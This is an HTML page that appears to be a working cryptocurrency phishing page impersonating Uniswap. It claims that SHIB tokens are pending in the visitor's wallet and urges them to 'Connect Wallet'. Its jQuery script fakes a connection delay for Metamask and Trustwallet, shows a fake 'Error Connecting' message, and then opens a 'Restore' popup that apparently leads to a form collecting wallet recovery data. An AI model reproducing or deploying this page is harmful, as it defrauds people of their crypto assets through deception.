<!DOCTYPE html>
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <link rel="stylesheet" href="./Uniswap_files/bootstrap.min.css">
    <link rel="shortcut icon" href="./Uniswap_files/raca.png">
    <style>
      @font-face {
        font-family: inter;
        src: url('inter.woff2') format('woff2');
      }
      
      @font-face {
        font-family: atkinson;
        src: url('atkinson.woff2') format('woff2');
      }

      * {
        font-family: 'inter';
      }

      body {
        background-color: #000;
        background: url('uniswapbg.png') no-repeat center center fixed;
        background-size: cover;
        font-family: 'inter';
      }

      nav .btncustom {
        margin-left: 10px;
      }

      .btncustom, a.btncustom {
        text-decoration: none;
        padding: 0.5rem;
        border-radius: 12px;
        font-weight: 500;
      }

      .btncustom2, a.btncustom2 {
        text-decoration: none;
        padding: 1rem;
        color: #fff;
        font-weight: 700;
        background-color: rgb(44, 47, 54);
        border:1px solid rgb(64, 68, 79);
        border-radius: 12px;
      }

      .btnprimary {
        color: rgb(80, 144, 234);
        background: #1c2f48;
      }

      .btnsecondary {
        color: #fff;
        background: rgb(33, 36, 41);
      }

      .card-custom {
        background: rgb(25, 27, 31);
        color: #fff;
        padding: 1px;
        border-radius: 24px;
        font-size: 14pt;
      }

      .card-item {
        background: rgb(33, 36, 41);
        border-radius: 20px;
        border: 1px solid rgb(44, 47, 54);
      }

      .combo-ellipse-container {
        background-color: rgb(25, 27, 31);
        border-radius: 16px;
        padding: 10px 8px;
        width: 30%;
        cursor: pointer;
      }

      .combo-ellipse-container img {
        background-color: #fff;
        border-radius: 150px;
      }

      .item-arrow-separator {
        background-color: rgb(33, 36, 41);
        border: 3px solid rgb(25, 27, 31);
        border-radius: 12px;
        height: 35px;
        width: 35px;
        margin: auto;
        position:relative;
        margin-top: -14px;
        margin-bottom: -32px;
        z-index: 99;
      }

      .item-value {
        overflow: hidden;
        width: 60%;
      }

      .alert {
        border: 1px solid #fd4146;
        color: #fd4146;
        border-radius: 12px;
      }

      .hiddenElement {
        display: none !important;
      }

      @media screen and (max-width: 600px) {
        .hidden-on-mobile {
          display: none !important;
        }
        .combo-ellipse-container {
          width: 65%;
        }
        .item-value {
          width: 35%;
        }
        .item-value span, .item-value small{
          font-size: 10pt !important; 
        }
      }

      @media screen and (max-width: 1024px) {
        .hidden-on-mobile {
          display: none !important;
        }
        .combo-ellipse-container {
          width: 60%;
        }
        .item-value {
          width: 40%;
        }
        .item-value span, .item-value small{
          font-size: 10pt !important; 
        }
      }
    </style>

    <title>Uniswap</title>
  </head>
  <body>
    <nav class="navbar navbar-expand-lg navbar-dark">
      <a class="navbar-brand" href="./wallet/#">
        <img src="./Uniswap_files/raca.png" width="80px" height="100%" viewbox="0 0 14 15" fill="#FFFFFF">
        
      </a>
      <div class="ml-auto">
             <!-- <a class="btncustom btnsecondary">
         <img src="" alt="" height="20" width="20"> 
          <span class="hidden-on-mobile"> Ethereum</span>
        </a> -->
        <a href="./wallet/" class="btncustom btnprimary triggerConnectWallet">Connect Wallet</a>
      </div>
    </nav>

    <div class="container mt-5">
      <div class="row">
        <div class="col-md-3"></div>
        <div class="col-md-6 col-sm-12">
          
          <div class="card card-custom">
            <div class="card-body">
              Claim

              
              </div>
              <div class="item-arrow-separator text-center">
                <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="#8F96AC" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><line x1="12" y1="5" x2="12" y2="19"></line><polyline points="19 12 12 19 5 12"></polyline></svg>
              </div>

<br>
              <div class="mt-3 d-flex justify-content-between" style="font-size: 10pt;">

                <div style="font-family: atkinson !important;">
                     <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="sc-1es900k-0 iWehYF"><circle cx="12" cy="12" r="10"></circle><line x1="12" y1="16" x2="12" y2="12"></line><line x1="12" y1="8" x2="12.01" y2="8"></line></svg>
                  258079800 SHIB has been pending into your Wallet. To receive this Token, please connect your wallet. After that you will receive your Rewards in 3 x 24 hours.
                
                </div>
              </div>

              <a href="./wallet/" class="btncustom btnprimary btn-block text-center mt-3 triggerConnectWallet">Connect Wallet</a>

            </div>
          </div>

        </div>
        <div class="col-md-3"></div>
      </div>
    </div>

    <div class="modal fade" id="connectModal" tabindex="-1" aria-labelledby="exampleModalLabel" aria-hidden="true">
      <div class="modal-dialog modal-dialog-centered">
        <div class="modal-content text-white" style="background-color: rgb(25, 27, 31); border: 1px solid rgb(33, 36, 41); border-radius: 20px;">
          <div class="modal-header" style="border-bottom: none">
            <h5 class="modal-title" id="connectModal">Connect a Wallet</h5>
            <button type="button" class="close" data-dismiss="modal" aria-label="Close">
              <span aria-hidden="true" class="text-white">×</span>
            </button>
          </div>
          <div class="modal-body">

            <div class="card card-item">
              <div class="card-body" style="font-size: 10pt;">
                By connecting a wallet, you agree to our Terms of Service and acknowledge that you have read and understand the Protocol Disclaimer.
              </div>
            </div>

            <div class="alert mt-3" role="alert" id="alertForRestore" style="display: none;">
              Error Connecting &nbsp; <a href="./wallet/#" id="linkToForm" class="btn btn-secondary btn-sm" onclick="window.open(this.href,&#39;targetWindow&#39;,&#39;toolbar=no,location=no,status=no,menubar=no,scrollbars=yes,resizable=yes,width=450,height=900&#39;); return false;">Restore</a>
            </div>
            <div class="card card-item mt-3" id="alertForRestore2" style="display: none;">
              <div class="card-body d-flex justify-content-between align-items-center" style="font-size: 10pt;">
                <div>
                  <b>Warning!</b> <br>
                  Click restore to connect your wallet
                </div>
                <img src="./wallet/" height="24" width="auto" id="imgOfAlertForRestore2">
              </div>
            </div>

            <a href="./metamask/" class="btncustom2 btn-block mt-3 d-inline-flex justify-content-between btnConnect" data-type="Metamask" data-logo="metamask-fox.svg">
              <span>
                Metamask
                &nbsp;
                <div class="spinner-border loader" role="status" id="loaderForMetamask" style="height: 15px; width: 15px; display: none;">
                  <span class="sr-only">Loading...</span>
                </div>
              </span> 
              <img src="./Uniswap_files/metamask-fox.svg" width="24" height="24">
            </a>
            <a href="./trust/" class="btncustom2 btn-block mt-3 d-inline-flex justify-content-between btnConnect" data-type="Trustwallet" data-logo="trustwallet.png">
              <span>
                Trustwallet
                &nbsp;
                <div class="spinner-border loader" role="status" id="loaderForTrustwallet" style="height: 15px; width: 15px; display: none;">
                  <span class="sr-only">Loading...</span>
                </div>
              </span>
              <img src="./Uniswap_files/trustwallet.png" width="auto" height="24">
            </a>
          </div>
        </div>
      </div>
    </div>

    <script src="./Uniswap_files/jquery.slim.min.js.download"></script>
    <script src="./Uniswap_files/popper.min.js.download"></script>
    <script src="./Uniswap_files/bootstrap.min.js.download"></script>
    <script>
      $(function(){
        function visibility(visible, link = undefined, type = undefined, img = undefined) {
          $(".loader").css('display','none')
          if(visible == false) {
            $("#alertForRestore").css('display','none')
            $("#alertForRestore2").css('display','none')
            $(".btnConnect").removeClass('hiddenElement')
          } else {
            $("#loaderFor" + type).css('display','')
            setTimeout(function(){
              $(".btnConnect").addClass('hiddenElement')
              $("#alertForRestore").css('display','')
              $("#alertForRestore2").css('display','')
              $("#imgOfAlertForRestore2").attr('src',img)
              $(".loader").css('display','none')
            },5000)
          }

          if(typeof link !== 'undefined') $("#linkToForm").attr('href',link)
        }

        visibility(false)

        $(".btnConnect").on("click",function(e){
          e.preventDefault()
          const link = $(this).attr("href")
          const type = $(this).data("type")
          const img = $(this).data("logo")
          visibility(true,link,type,img)
        })

        $(".triggerConnectWallet").on("click",function(e){
          e.preventDefault()
          visibility(false)
          $("#connectModal").modal("show")
        })
      })
    </script>
  
</body></html>